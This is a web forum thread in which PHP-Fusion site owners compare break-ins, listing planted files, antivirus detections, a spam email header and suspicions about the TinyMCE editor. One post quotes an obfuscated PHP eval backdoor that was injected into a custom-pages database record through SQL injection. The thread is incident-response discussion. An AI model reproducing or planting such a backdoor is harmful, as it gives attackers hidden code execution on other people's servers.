Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.
Not a member yet? Click here to register.
Forgot Password?

My site was hacked

Asked Modified Viewed 76,407 times
P
Pippi
P
Pippi 10
  • Member, joined since
  • Contributed 65 posts on the community forums.
  • Started 13 threads in the forums
  • Started this discussions
asked

Just want to share so others can learn.

I had still PHP-fusion v 7.02.05, got hacked, got this information from my host:

Malware uploaded through weakness in outdated PHP-fusion script.
Files uploaded by hacker:
administration/Dlogoff.php
administration/wishlistl08.php
viewpage.php
wp-conf.php

Problem is fixed, now I have updated all my sites to 7.02.06.:G
0 replies

142 posts

A
alecxz
A
alecxz 10
  • Junior Member, joined since
  • Contributed 19 posts on the community forums.
  • Started 4 threads in the forums
answered

new worm
www.alecxz.altervista.org/infusions/image_hosting/thumbs/1d915cf1732ff8ac7dd34671df14fb7f.jpg
0 replies
T
tmielke
T
  • Newbie, joined since
  • Contributed 1 post on the community forums.
answered

Would be interesting to know what infusions and other scripts you had installed on your webspace...

First, check the fusion_errors table as tojans are often not programmed that clean and tend to produce warnings or errors. This record revealed the weak spot on my site to me:

(121, 8, 'A non well formed numeric value encountered', '/web/1/000/051/562/203796/htdocs/infusions/shop_system/warenkorb.php', 121, '/infusions/shop_system/warenkorb.php', 0, '85.25.71.100', 4, 0, 1360061166),

Using warenkorb.php for sql code injection, a new record was added to fusion_custom_pages this way:

(2, 'testtitl', 0, '                                                                                                         <?php if(isset($_GET[\\''viewpages\\''])) { $d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,
0,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);exit; } ?>   

I deleted the record and in the Laaser shop system, which allowed code injection, encapsuled all $_GET and $_POST references with connections to mysql queries in mysql_real_escape_string() function calls.
0 replies
— 1 month earlier —
J
janmol
J
janmol 10
Jan Mølgård
PHP-Fusion, Denmark
Phone: 004528966794
Mail: janmol@wordit.dk
Mail: janm@janm.dk

Testsite version 9: http://php-fusion.dk/fusion_9_test/
  • Veteran Member, joined since
  • Contributed 752 posts on the community forums.
  • Started 256 threads in the forums
answered
Veteran Member

Have had the same experience with a customers site. Hacker injected some code in a custom_pages page. And used this (as far as I can see) to execute something through viewpage.php.
0 replies
C
Craig
C
Craig 14
  • Fusioneer, joined since
  • Contributed 4,462 posts on the community forums.
  • Started 212 threads in the forums
answered
Fusioneer

Domi wrote:

@Tyler
I never said that.

I said it since it's true, he must be confused with that. :D
0 replies
F
Falk
F
Falk 131
Need help?, Having trouble?
• View our Documentation for Guides, Standards and Functions
• Name and Organize your Topics and Content correctly in the corresponding Forums for best support results
• Attaching Log Files and Screenshots when reporting issues will help
• Provide with an URL to live example if one exists
• Please read the How to Report an Error post
• Please read and comply with the Code of Conduct

(¯·._.·(¯°·._.·°º*[ Project Manager ]*º°·._.·°¯)·._.·¯)
  • Super Admin, joined since
  • Contributed 6,201 posts on the community forums.
  • Started 639 threads in the forums
  • Answered 11 questions
answered
Super Admin

@Tyler
I never said that.

@Baby Tunes
Can you show any logs of how the files got there?.
I mean any trace of where the original attack on your site happens.
All you show now is files that have been inserted one way or the other to your server , but we do not know how they got there.
You have found them in the TinyMCE directorys, but they could endup in any directory.
Just because they are in TinyMCE directories it dosen´t mean we can say it´s tiny that caused it.
0 replies
B
Baby Tunes
B
Sorry for my English, but Google is not perfect
  • Newbie, joined since
  • Contributed 9 posts on the community forums.
  • Started 3 threads in the forums
answered

Well, 3 different servers, multiple pages and all is the same problem occurred when TinyMCE. Again and again in the TinyMCE injections were started.

Fusion itself is everywhere 02.07.06, PHP version is the latest and even MySQL is updated regularly by me, so it's all up to date.

The servers are where it all goes optimally protected only against the injections can not protect completely loving.

Now if only the TinyMCE is necessarily to blame it, you can not say directly, but via the submit.php can not happen. These are sometimes even non-existent, because I quite loving what is not needed, is not only on the server then.

Fusion has ansich think somewhere some vulnerabilities, they are being used at the time simply geziehlt. After the first spam attack all data were cleaned, passwords and ports in some cases. It is no more data from the attack were present.
0 replies
T
Tyler
T
Tyler 10
Helping, would be pointing you in the right direction, not doing it all for you.
  • Member, joined since
  • Contributed 198 posts on the community forums.
answered

Domi, if we stopped using tiny mce - which is rather weird (i never did use it so I wasn't aware it wasn't used anymore) - why would we still package it with php-fusion?

It enables users/developers to use an outdated script.

I guess speculating is much more than others' are doing :|
There's obviously an issue.
0 replies
F
Falk
F
Falk 131
• Name and Organize your Topics and Content correctly in the corresponding Forums for best support results

• Answered 11 questions
answered
Super Admin

I see alot of speculations here, none wich have anything useful in it, it really dosen´t help to randomly guess.

These files that are uploaded/created, they have not been altered and they do not prove that it is tinyMCE that are the cultprit on that or any other site.

/var/www/virtual/1beatz.eu.xx/htdocs/includes/jscripts/tiny_mce/plugins/autosave/images/functions.php: PHP.Trojan.Spambot FOUND
/var/www/virtual/1beatz.eu.xx/htdocs/includes/jscripts/tiny_mce/plugins/insertdatetime/sql.php: PHP.Trojan.Spambot FOUND
/var/www/virtual/1beatz.eu.xx/htdocs/includes/jscripts/tiny_mce/plugins/xhtmlxtras/css/sql.php: PHP.Trojan.Spambot FOUND
/var/www/virtual/1beatz.eu.xx/htdocs/includes/jscripts/tiny_mce/plugins/spellchecker/functions.php: PHP.Trojan.Spambot FOUND

All i can see is that we had thusands of hacked sites with similar results, randomly modified files or new files inserted.
What we can tell today is that most seem to be secure when they have updated and made a proper clean of their directories and databases, including password changes.

Many people have posted how to get clean many times in this and other threads.

I have seen no real indications or evidence that our current PHPFusion version would be unsecure.

The only additional info i can give everyone here is that you need a PHP version equal to 5.3.4 or higher to stay safe from null byte attacks wich can execute payloads that comes within images that can have been uploaded to your site.
0 replies
B
Baby Tunes
B
  • Newbie, joined since
answered

@ Craig
One does not have direct access via the admin area to create but if you know the system and know where the folder is, that is enough. There are also tools with which one can scan all FTP a domain without the need to hook it. Because it does not matter whether a blank index.php is present or not.
You should make time thought surely it must be the TinyMCE or not to go other editors like CKEditor or something?

Mitlerweile are further cases known where eg. also has been attacked config.php, you should suspect a file for at least one injection.

Let's put it simply: Currently, the core of the technology is simply outdated and there simply must be what made &#8203;&#8203;mandatory.
0 replies
C
Craig
C
Craig 14
answered
Fusioneer

Tyler, submit.php used for public submissions no longer uses Tiny MCE, I think from either v7.02.04 or 05 Can't remember exactly which version but it is not used anymore in submit.php Tiny MCE is only used in the Admin for News, Articles and Custom Pages. So if that is the issue then the Attacker would need access to the Admin area, if that is the case then I think we have more to worry about than the tiny mce. Or if it is via a tiny mce exploit then we need to worry more about how he gained access to the file for tiny mce.

PHPFusion Leader And Senior Developers please speak up? (those who code)
0 replies
T
Tyler
T
Tyler 10
Helping, would be pointing you in the right direction, not doing it all for you.
  • Member, joined since
answered

Well maybe they should do SOMETHING. At least tell people to not use tiny mce. We've seen at least 4 people's site get hacked - although we can't confirm a cause.

The easiest thing they could do is warn users although what we need is a replacement/quick fix... As I mentioned in one of my other posts we could just adopt a html filter to keep tiny mce with minimal work.

I think that'll be ideal with v8 in the works but it's not up to me.
0 replies
C
Craig
C
Craig 14
answered
Fusioneer

I know we do not use tiny mce for submissions any more so figure that one.
0 replies
W
Wanabo
W
Wanabo 10
www.probemyip.com/probe-my-ip-80x15.png
pHp-Fusion.Asia & pHp-Fusion.Fr & pHp-Fusion.Cn are available for a localized support community. Send PB for info.
  • Senior Member, joined since
  • Contributed 598 posts on the community forums.
  • Started 94 threads in the forums
answered

No coincidence then that an alternative for tiny mce was presented recently.
See, Redactor.
Do the admins know more than us mortals?
0 replies
T
Tyler
T
Tyler 10
  • Member, joined since
answered

Well I would assume the solution would be to adopt a html filter...
Not only would it secure html but make it standard-compliant.

I do hope someone looks into this. I know if php-fusion had an obvious flaw this site would be the first to see hacking/defacing attempts. However, as I speculated earlier if it is TinyMCE data being improperly handled we wouldn't see problems here because submissions are not allowed (that's generally where tinymce is used - publicly)....

On another note this is entirely hard to diagnose due to all of the factors. Every host/configuration is different. People could be using insecure addons or try doing improvements themselves causing issues...

Hopefully we can get some closure on this subject some time soon.
0 replies
B
Baby Tunes
B
  • Newbie, joined since
answered

What can you say to that? Use only in itself infusions CKEditor, you should be the new version may also schedule times and not continue to work in the v8 with the Tiny.

Perhaps we should find a solution then again superior to the 7 Series, up to the v8 comes and also this will be so popular, it will probably take something also.
0 replies
T
Tyler
T
Tyler 10
  • Member, joined since
answered

TincyMCE claims that there is no immediate risk using TinyMCE however they "recommend" using a HTML purifier - weird :o
0 replies
B
Baby Tunes
B
  • Newbie, joined since
answered

This is only an excerpt of the report, this is at the 8 domains and 3 more servers I maintain.

Guess the problem comes directly from TinyMCE because it has become strikingly beautiful more often in recent weeks for sollche things.
Where what has been found is in Geshi BB code, but I rather think that this causes less a cause.

After I deleted the TinyMCE because I need to nowhere, restarted server and lo and behold, it is calm. Previously, once restarted where Tiny was still there, within 5 minutes the problem went on.
Chmod are all set correctly.
0 replies
T
Tyler
T
Tyler 10
  • Member, joined since
answered

I can only speculate but there's a known issue with TinyMCE 3.5.8 (Latest)

We are running 3.3.8 - if that says something right there.

There's an encoding issue WHEN the bbcode plugin is configured for tinymce. I haven't even looked into what we have yet but it's possible that submissions or other parts of the site that use TinyMCE could be the culprit.

I'm just wondering if the data isn't being filtered properly...

@Baby Tunes - This isn't the only way but using insecure email forms/automailers could be an issue. The headers are tampered and used maliciously. Just something to think about.
0 replies
B
Baby Tunes
B
  • Newbie, joined since
answered

Seems that the gap is not closed under 7:02:06.

I come now we dadrauf:
My server provider has once again found massive spam, sent it to me but also the header of the email:

Return-Path: <>
Received: from n096h054.rs.de.inter.net (n096h054.rs.de.inter.net [213.73.96.54])
by mtain-de05.r1000.mx.aol.com (Internet Inbound) with ESMTP id 651C638000082
for <>; Sun, 31 Mar 2013 18:13:29 -0400 (EDT)
Received: by n096h054.rs.de.inter.net (Postfix, from userid 2008)
id D3E593EE4A4; Sat, 30 Mar 2013 22:35:28 +0100 (CET)
To:
Subject: FW: hi
X-PHP-Originating-Script: 2008:javascript.php
Reply-To: "Finlay Sargent" <>
X-Priority: 3 (Normal)
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Message-Id: <>
Date: Sat, 30 Mar 2013 22:35:28 +0100 (CET)
Content-Transfer-Encoding: quoted-printable
x-aol-global-disposition: S
X-AOL-REROUTE: YES
x-aol-sid: 3039ac1d40cd5158b5095e0f
X-AOL-IP: 213.73.96.54
X-AOL-SPF: domain : 1beatz.eu SPF : none

Now I have done a virus scan with ClamAV and as well in the header of the mail he has shown me on all sides of the javascript.php 7:02:06 in BB codes and hidden reported.

Who has a Debian server, this should install http://blog.serve times ... nux-debian

There it is described as a cronjob every day a scan is done. Windows Server should be equipped with a virus program.

Where now but that is the passage in order to even start a spam attack, I do not know.

edit:
Seems that is the exploit in TinyMCE, now there were all the spam data found:

/var/www/virtual/1beatz.eu.xx/htdocs/includes/jscripts/tiny_mce/plugins/autosave/images/functions.php: PHP.Trojan.Spambot FOUND
/var/www/virtual/1beatz.eu.xx/htdocs/includes/jscripts/tiny_mce/plugins/insertdatetime/sql.php: PHP.Trojan.Spambot FOUND
/var/www/virtual/1beatz.eu.xx/htdocs/includes/jscripts/tiny_mce/plugins/xhtmlxtras/css/sql.php: PHP.Trojan.Spambot FOUND
/var/www/virtual/1beatz.eu.xx/htdocs/includes/jscripts/tiny_mce/plugins/spellchecker/functions.php: PHP.Trojan.Spambot FOUND

0 replies
G
gojuryu
G
www.gojuryu.net
Online since 1998 & running PHP-Fusion since 2004
  • Member, joined since
  • Contributed 105 posts on the community forums.
  • Started 16 threads in the forums
answered

Thanks Tyler. I've left it alone and did find a series of items which may be causing the spammers to get into my site.
0 replies

Labels

None yet

Statistics

• Views 0 views
  • Posts 142 posts
  • Votes 0 votes
  • Topic users 41 members

41 participants

F
F
Falk 131

• Answered 11 questions
J
J
janmol 10
Jan Mølgård
PHP-Fusion, Denmark
Phone: 004528966794
Mail: janmol@wordit.dk
Mail: janm@janm.dk

Testsite version 9: http://php-fusion.dk/fusion_9_test/
  • Contributed 752 posts on the community forums.
  • Started 256 threads in the forums
H
H
Homdax 10
  • Contributed 2,246 posts on the community forums.
  • Started 108 threads in the forums
T
T
  • Newbie, joined since
G
G
www.gojuryu.net
Online since 1998 & running PHP-Fusion since 2004
  • Member, joined since
  • Contributed 105 posts on the community forums.
  • Started 16 threads in the forums
C
C
Craig 14
V
V
val 10
  • Contributed 40 posts on the community forums.
  • Started 11 threads in the forums
Q
Q
www.php-fusion.co.uk/../../images/smiley/cool.gif

Mike
---------------------------------------
Quartzkyte, admin @ French N.S.S.
  • Contributed 404 posts on the community forums.
  • Started 40 threads in the forums
W
W
Wanabo 10
www.probemyip.com/probe-my-ip-80x15.png
pHp-Fusion.Asia & pHp-Fusion.Fr & pHp-Fusion.Cn are available for a localized support community. Send PB for info.
  • Contributed 598 posts on the community forums.
  • Started 94 threads in the forums
K
K
kd6oji 10
  • Contributed 15 posts on the community forums.
M
M
  • Member, joined since
  • Contributed 114 posts on the community forums.
  • Started 11 threads in the forums
D
D
Drbo 10
WinXP, Opera 12.14
  • Contributed 258 posts on the community forums.
  • Started 55 threads in the forums
A
A
  • Contributed 725 posts on the community forums.
  • Started 128 threads in the forums
N
N
NetriX 10
Need help? Having trouble?
» View our Documentation for guides, functions and more - including the Getting Started section!
» Attach Log Files and Screenshots when reporting issues
» My support days are usually Mon-Thurs. Send me a PM if urgent.
  • Contributed 566 posts on the community forums.
  • Started 93 threads in the forums
Q
Q
  • Member, joined since
  • Contributed 54 posts on the community forums.
  • Started 23 threads in the forums
F
F
faga 10
I choose a lazy person to do a hard job. Because a lazy person will find an easy way to do it.” - Bill Gates
  • Member, joined since
  • Contributed 158 posts on the community forums.
  • Started 14 threads in the forums
P
P
  • Contributed 1,633 posts on the community forums.
  • Started 29 threads in the forums
A
A
  • Newbie, joined since
  • Contributed 6 posts on the community forums.
  • Started 2 threads in the forums
H
H
  • Contributed 262 posts on the community forums.
  • Started 28 threads in the forums
B
B
  • Newbie, joined since
J
J
jikaka 10
www.rusfusion.ru - russian nss
  • Contributed 946 posts on the community forums.
  • Started 82 threads in the forums
P
P
Pippi 10
  • Member, joined since
  • Contributed 65 posts on the community forums.
  • Started 13 threads in the forums
  • Started this discussions
R
R
Rush_ 10
  • Contributed 34 posts on the community forums.
J
J
JoiNNN 10
  • Contributed 850 posts on the community forums.
  • Started 100 threads in the forums
S
S
Get v9 Infusion by SuN-Infusions here:
https://sun-infusions.de/ (German)
  • Contributed 12 posts on the community forums.
  • Started 5 threads in the forums
T
T
Tyler 10
  • Member, joined since
A
A
Archer 9
  • Member, joined since
  • Contributed 115 posts on the community forums.
  • Started 7 threads in the forums
Z
Z
zizub 10
  • Member, joined since
  • Contributed 156 posts on the community forums.
  • Started 29 threads in the forums
A
A
alecxz 10
  • Contributed 19 posts on the community forums.
J
J
  • Newbie, joined since
  • Contributed 4 posts on the community forums.
  • Started 1 thread in the forums
B
B
  • Newbie, joined since
A
A
AT0m 10
  • Contributed 30 posts on the community forums.
  • Started 7 threads in the forums
S
S
Spikey 10
  • Newbie, joined since
  • Contributed 6 posts on the community forums.
I
I
  • Newbie, joined since
  • Contributed 4 posts on the community forums.
  • Started 1 thread in the forums
S
S
  • Contributed 10 posts on the community forums.
S
S
Scurit 10
Website Security & Malware Removal Specialist
http://www.scurit.com
  • Newbie, joined since
  • Contributed 2 posts on the community forums.
A
A
  • Newbie, joined since
  • Contributed 3 posts on the community forums.
S
S
sals_s 10
  • Newbie, joined since
A
A
  • Newbie, joined since
  • Contributed 3 posts on the community forums.
  • Started 2 threads in the forums
P
P
  • Contributed 11 posts on the community forums.
M
M
  • Newbie, joined since

Notifications

Track thread

You are not receiving notifications from this thread.

Related Questions

Not yet